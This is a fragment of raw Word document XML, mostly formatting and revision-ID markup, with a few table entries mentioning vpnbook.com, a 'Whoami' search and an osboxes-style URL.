          <w:p w14:paraId="2298F7FF" w14:textId="77777777" w:rsidR="00FB73F5" w:rsidRDefault="00FB73F5" w:rsidP="00E15CBD"/>
          <w:p w14:paraId="6D877248" w14:textId="77777777" w:rsidR="00FB73F5" w:rsidRDefault="00FB73F5" w:rsidP="00E15CBD"/>
          <w:p w14:paraId="04CDBB50" w14:textId="77777777" w:rsidR="00FB73F5" w:rsidRDefault="00FB73F5" w:rsidP="00E15CBD"/>
          <w:p w14:paraId="48DF078D" w14:textId="77777777" w:rsidR="00FB73F5" w:rsidRDefault="00FB73F5" w:rsidP="00E15CBD"/>
          <w:p w14:paraId="6BC8EA6C" w14:textId="63979293" w:rsidR="00FB73F5" w:rsidRDefault="00FB73F5" w:rsidP="00E15CBD"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6F4C6D6A" w14:textId="3828E343" w:rsidR="009E14E3" w:rsidRDefault="000C6EB0" w:rsidP="00E15CBD">
            <w:r>
              <w:t>&gt;https://v</w:t>
            </w:r>
            <w:r w:rsidR="007D336A">
              <w:t>pnbook.com</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="15D61EDB" w14:textId="5BA54B73" w:rsidR="007D336A" w:rsidRDefault="007D336A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34BC66F1" w:rsidR="009E14E3" w:rsidRDefault="003E678C" w:rsidP="00E15CBD">
            <w:r>
              <w:t xml:space="preserve">Google search: </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Whoami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55"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5A9C9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93688"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3D4AB526"/>
    <w:lvl w:ilvl="0" w:tplc="3168ED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0DAD"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="20968F74"/>
    <w:lvl w:ilvl="0" w:tplc="F232F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75223"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6564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2AE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B46E632C"/>
    <w:lvl w:ilvl="0" w:tplc="B2B44D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23810"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F5405956"/>
    <w:lvl w:ilvl="0" w:tplc="98EC1C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35021"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3DA6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12"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1548644043">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="92751156">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="390814802">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1514765802">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="2140680956">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1634290607">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1474054670">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="2020355101">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="799345839">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="472672449">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="2116365198">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="606545074">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="1394505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336C0"/>
    <w:rsid w:val="00042797"/>
    <w:rsid w:val="000469F4"/>
    <w:rsid w:val="00051B30"/>
    <w:rsid w:val="00056F93"/>
    <w:rsid w:val="00063589"/>
    <w:rsid w:val="000657DE"/>
    <w:rsid w:val="00070596"/>
    <w:rsid w:val="00070EE5"/>
    <w:rsid w:val="00072DA2"/>
    <w:rsid w:val="00075D06"/>
    <w:rsid w:val="0009568C"/>
    <w:rsid w:val="00096005"/>
    <w:rsid w:val="000A0FC4"/>
    <w:rsid w:val="000A65E9"/>
    <w:rsid w:val="000C2769"/>
    <w:rsid w:val="000C3C6C"/>
    <w:rsid w:val="000C5654"/>
    <w:rsid w:val="000C6EB0"/>
    <w:rsid w:val="000E0987"/>
    <w:rsid w:val="000E0E62"/>
    <w:rsid w:val="000E70CD"/>
    <w:rsid w:val="000E7AE3"/>
    <w:rsid w:val="000F1607"/>
    <w:rsid w:val="000F4A87"/>
    <w:rsid w:val="000F4CD7"/>
    <w:rsid w:val="000F56F7"/>
    <w:rsid w:val="00103F43"/>
    <w:rsid w:val="00107614"/>
    <w:rsid w:val="001115E1"/>
    <w:rsid w:val="0011296F"/>
    <w:rsid w:val="0012100A"/>
    <w:rsid w:val="001211B7"/>
    <w:rsid w:val="0012202C"/>
    <w:rsid w:val="001226E0"/>
    <w:rsid w:val="00122EFC"/>
    <w:rsid w:val="00124976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A3E77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024AD"/>
    <w:rsid w:val="002040D3"/>
    <w:rsid w:val="0022042C"/>
    <w:rsid w:val="00223CF7"/>
    <w:rsid w:val="0022570D"/>
    <w:rsid w:val="0023394C"/>
    <w:rsid w:val="00243B6A"/>
    <w:rsid w:val="00244229"/>
    <w:rsid w:val="002522F5"/>
    <w:rsid w:val="00252CE3"/>
    <w:rsid w:val="00256748"/>
    <w:rsid w:val="00262322"/>
    <w:rsid w:val="002646DE"/>
    <w:rsid w:val="002654BD"/>
    <w:rsid w:val="00267A9A"/>
    <w:rsid w:val="0027188F"/>
    <w:rsid w:val="002851AD"/>
    <w:rsid w:val="00285A9D"/>
    <w:rsid w:val="002905F3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2CE"/>
    <w:rsid w:val="002E63C1"/>
    <w:rsid w:val="002E6DA1"/>
    <w:rsid w:val="002F2347"/>
    <w:rsid w:val="003035A2"/>
    <w:rsid w:val="0030731F"/>
    <w:rsid w:val="0031724E"/>
    <w:rsid w:val="00322F0E"/>
    <w:rsid w:val="0034438C"/>
    <w:rsid w:val="0034722B"/>
    <w:rsid w:val="0034744B"/>
    <w:rsid w:val="00357D92"/>
    <w:rsid w:val="00377A68"/>
    <w:rsid w:val="00377FBA"/>
    <w:rsid w:val="00384144"/>
    <w:rsid w:val="003917BB"/>
    <w:rsid w:val="003960E1"/>
    <w:rsid w:val="00397DBF"/>
    <w:rsid w:val="003A1BBC"/>
    <w:rsid w:val="003B6A08"/>
    <w:rsid w:val="003C36A4"/>
    <w:rsid w:val="003D1F43"/>
    <w:rsid w:val="003E1086"/>
    <w:rsid w:val="003E3F09"/>
    <w:rsid w:val="003E618E"/>
    <w:rsid w:val="003E678C"/>
    <w:rsid w:val="003E7148"/>
    <w:rsid w:val="003E71CC"/>
    <w:rsid w:val="003F368A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2C5B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B49D9"/>
    <w:rsid w:val="004D1676"/>
    <w:rsid w:val="004D266C"/>
    <w:rsid w:val="004D3145"/>
    <w:rsid w:val="004D6320"/>
    <w:rsid w:val="004E281E"/>
    <w:rsid w:val="004F012B"/>
    <w:rsid w:val="00500FAD"/>
    <w:rsid w:val="0050143B"/>
    <w:rsid w:val="00501BCC"/>
    <w:rsid w:val="00502F60"/>
    <w:rsid w:val="00530F2B"/>
    <w:rsid w:val="00532376"/>
    <w:rsid w:val="00532C81"/>
    <w:rsid w:val="005341B8"/>
    <w:rsid w:val="005438B4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5F03BF"/>
    <w:rsid w:val="006123E4"/>
    <w:rsid w:val="0061290F"/>
    <w:rsid w:val="00620B00"/>
    <w:rsid w:val="006220B0"/>
    <w:rsid w:val="0062274B"/>
    <w:rsid w:val="00622751"/>
    <w:rsid w:val="0062304E"/>
    <w:rsid w:val="006316B8"/>
    <w:rsid w:val="006336DF"/>
    <w:rsid w:val="00640489"/>
    <w:rsid w:val="00654009"/>
    <w:rsid w:val="00657D14"/>
    <w:rsid w:val="00660728"/>
    <w:rsid w:val="00662DEE"/>
    <w:rsid w:val="00662DF4"/>
    <w:rsid w:val="0068341C"/>
    <w:rsid w:val="0068710E"/>
    <w:rsid w:val="00690490"/>
    <w:rsid w:val="0069076C"/>
    <w:rsid w:val="00692AF9"/>
    <w:rsid w:val="006938B3"/>
    <w:rsid w:val="00693BA0"/>
    <w:rsid w:val="006A130C"/>
    <w:rsid w:val="006A170E"/>
    <w:rsid w:val="006A5E02"/>
    <w:rsid w:val="006A62BE"/>
    <w:rsid w:val="006C2D06"/>
    <w:rsid w:val="006C339F"/>
    <w:rsid w:val="006C7652"/>
    <w:rsid w:val="006D0724"/>
    <w:rsid w:val="006D3083"/>
    <w:rsid w:val="006D38BA"/>
    <w:rsid w:val="006E568A"/>
    <w:rsid w:val="006F4086"/>
    <w:rsid w:val="006F6E7F"/>
    <w:rsid w:val="00716254"/>
    <w:rsid w:val="00722DF0"/>
    <w:rsid w:val="00727392"/>
    <w:rsid w:val="00730977"/>
    <w:rsid w:val="00740A03"/>
    <w:rsid w:val="00751059"/>
    <w:rsid w:val="0075365A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A6632"/>
    <w:rsid w:val="007B3B4C"/>
    <w:rsid w:val="007B5775"/>
    <w:rsid w:val="007B6D84"/>
    <w:rsid w:val="007B7B9C"/>
    <w:rsid w:val="007C09D9"/>
    <w:rsid w:val="007C2C6F"/>
    <w:rsid w:val="007C4354"/>
    <w:rsid w:val="007C46E1"/>
    <w:rsid w:val="007C7509"/>
    <w:rsid w:val="007C7D90"/>
    <w:rsid w:val="007D336A"/>
    <w:rsid w:val="007D5929"/>
    <w:rsid w:val="007D6162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32C8F"/>
    <w:rsid w:val="00841070"/>
    <w:rsid w:val="00846066"/>
    <w:rsid w:val="008477D1"/>
    <w:rsid w:val="00851A0B"/>
    <w:rsid w:val="00856627"/>
    <w:rsid w:val="0086099E"/>
    <w:rsid w:val="00864A74"/>
    <w:rsid w:val="00866146"/>
    <w:rsid w:val="0086675F"/>
    <w:rsid w:val="0089290C"/>
    <w:rsid w:val="00893346"/>
    <w:rsid w:val="008A6748"/>
    <w:rsid w:val="008B78F0"/>
    <w:rsid w:val="008C2727"/>
    <w:rsid w:val="008E5B30"/>
    <w:rsid w:val="008F031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2737"/>
    <w:rsid w:val="0096668C"/>
    <w:rsid w:val="00967B2E"/>
    <w:rsid w:val="00975A32"/>
    <w:rsid w:val="00975B42"/>
    <w:rsid w:val="009775F5"/>
    <w:rsid w:val="0098065C"/>
    <w:rsid w:val="00991670"/>
    <w:rsid w:val="00992FFC"/>
    <w:rsid w:val="00993B44"/>
    <w:rsid w:val="00995DF6"/>
    <w:rsid w:val="009A072D"/>
    <w:rsid w:val="009A09E9"/>
    <w:rsid w:val="009A0BFB"/>
    <w:rsid w:val="009A5270"/>
    <w:rsid w:val="009C37BE"/>
    <w:rsid w:val="009C4C46"/>
    <w:rsid w:val="009E14E3"/>
    <w:rsid w:val="009E7034"/>
    <w:rsid w:val="009F7C90"/>
    <w:rsid w:val="00A06B0F"/>
    <w:rsid w:val="00A12DE5"/>
    <w:rsid w:val="00A13001"/>
    <w:rsid w:val="00A14902"/>
    <w:rsid w:val="00A15148"/>
    <w:rsid w:val="00A208C0"/>
    <w:rsid w:val="00A26B1C"/>
    <w:rsid w:val="00A336D5"/>
    <w:rsid w:val="00A34F78"/>
    <w:rsid w:val="00A462B6"/>
    <w:rsid w:val="00A47ED9"/>
    <w:rsid w:val="00A66260"/>
    <w:rsid w:val="00A70646"/>
    <w:rsid w:val="00A734E7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E4818"/>
    <w:rsid w:val="00AF1B41"/>
    <w:rsid w:val="00AF3E1D"/>
    <w:rsid w:val="00AF4F7A"/>
    <w:rsid w:val="00B10F4D"/>
    <w:rsid w:val="00B16D4D"/>
    <w:rsid w:val="00B2773E"/>
    <w:rsid w:val="00B3047A"/>
    <w:rsid w:val="00B33E15"/>
    <w:rsid w:val="00B37109"/>
    <w:rsid w:val="00B46A9D"/>
    <w:rsid w:val="00B46F52"/>
    <w:rsid w:val="00B46FC3"/>
    <w:rsid w:val="00B509CA"/>
    <w:rsid w:val="00B61D63"/>
    <w:rsid w:val="00B631ED"/>
    <w:rsid w:val="00B663DC"/>
    <w:rsid w:val="00B673BE"/>
    <w:rsid w:val="00B750C7"/>
    <w:rsid w:val="00B80AAB"/>
    <w:rsid w:val="00B81D72"/>
    <w:rsid w:val="00B86313"/>
    <w:rsid w:val="00B86354"/>
    <w:rsid w:val="00B86ACC"/>
    <w:rsid w:val="00B90CD6"/>
    <w:rsid w:val="00BA0749"/>
    <w:rsid w:val="00BC695B"/>
    <w:rsid w:val="00BC6F0C"/>
    <w:rsid w:val="00BC7667"/>
    <w:rsid w:val="00BD3BBE"/>
    <w:rsid w:val="00BD4AAC"/>
    <w:rsid w:val="00BD4E0D"/>
    <w:rsid w:val="00BD629B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3E70"/>
    <w:rsid w:val="00C145BC"/>
    <w:rsid w:val="00C14CC4"/>
    <w:rsid w:val="00C16B20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063A"/>
    <w:rsid w:val="00CE5E1F"/>
    <w:rsid w:val="00CE74AF"/>
    <w:rsid w:val="00CF6717"/>
    <w:rsid w:val="00D11E8D"/>
    <w:rsid w:val="00D15D21"/>
    <w:rsid w:val="00D212F5"/>
    <w:rsid w:val="00D260A7"/>
    <w:rsid w:val="00D31553"/>
    <w:rsid w:val="00D31D64"/>
    <w:rsid w:val="00D32D8E"/>
    <w:rsid w:val="00D36425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B0FFD"/>
    <w:rsid w:val="00DB491A"/>
    <w:rsid w:val="00DC192F"/>
    <w:rsid w:val="00DD06AD"/>
    <w:rsid w:val="00DE4484"/>
    <w:rsid w:val="00DF2620"/>
    <w:rsid w:val="00DF78D7"/>
    <w:rsid w:val="00E05B7D"/>
    <w:rsid w:val="00E06C01"/>
    <w:rsid w:val="00E233C3"/>
    <w:rsid w:val="00E237E7"/>
    <w:rsid w:val="00E308B0"/>
    <w:rsid w:val="00E31157"/>
    <w:rsid w:val="00E32A5C"/>
    <w:rsid w:val="00E35EAE"/>
    <w:rsid w:val="00E41DE5"/>
    <w:rsid w:val="00E43DF7"/>
    <w:rsid w:val="00E4694E"/>
    <w:rsid w:val="00E52436"/>
    <w:rsid w:val="00E569C4"/>
    <w:rsid w:val="00E628FA"/>
    <w:rsid w:val="00E62E1A"/>
    <w:rsid w:val="00E744CE"/>
    <w:rsid w:val="00E768F6"/>
    <w:rsid w:val="00E77408"/>
    <w:rsid w:val="00E77CBD"/>
    <w:rsid w:val="00E81E27"/>
    <w:rsid w:val="00E828F1"/>
    <w:rsid w:val="00E82F3E"/>
    <w:rsid w:val="00E850B5"/>
    <w:rsid w:val="00E85572"/>
    <w:rsid w:val="00EA58CA"/>
    <w:rsid w:val="00EA7332"/>
    <w:rsid w:val="00EC3DBB"/>
    <w:rsid w:val="00EC64D0"/>
    <w:rsid w:val="00ED3085"/>
    <w:rsid w:val="00ED3731"/>
    <w:rsid w:val="00ED4198"/>
    <w:rsid w:val="00EE01DD"/>
    <w:rsid w:val="00EE03E7"/>
    <w:rsid w:val="00EE3AAC"/>
    <w:rsid w:val="00EF173F"/>
    <w:rsid w:val="00EF1FC8"/>
    <w:rsid w:val="00EF6B0F"/>
    <w:rsid w:val="00F12471"/>
    <w:rsid w:val="00F14FAA"/>
    <w:rsid w:val="00F17F9E"/>
    <w:rsid w:val="00F2724A"/>
    <w:rsid w:val="00F30EB2"/>
    <w:rsid w:val="00F344E8"/>
    <w:rsid w:val="00F40368"/>
    <w:rsid w:val="00F4517E"/>
    <w:rsid w:val="00F55FC5"/>
    <w:rsid w:val="00F56091"/>
    <w:rsid w:val="00F56F7A"/>
    <w:rsid w:val="00F579FF"/>
    <w:rsid w:val="00F62B37"/>
    <w:rsid w:val="00F74176"/>
    <w:rsid w:val="00F83183"/>
    <w:rsid w:val="00F95A4D"/>
    <w:rsid w:val="00FB0E91"/>
    <w:rsid w:val="00FB4FAC"/>
    <w:rsid w:val="00FB6D18"/>
    <w:rsid w:val="00FB73F5"/>
    <w:rsid w:val="00FD0315"/>
    <w:rsid w:val="00FE16C1"/>
    <w:rsid w:val="00FE1984"/>
    <w:rsid w:val="00FE36AC"/>
    <w:rsid w:val="00FE6978"/>
    <w:rsid w:val="00FF400C"/>
    <w:rsid w:val="00FF6D91"/>
    <w:rsid w:val="00FF70B2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sboxes.org/android-x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6592</TotalTime>
  <Pages>12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227</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-11-01T19:10:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-11-22T18:43:00Z</dcterms:modified>
</cp:coreProperties>
</file>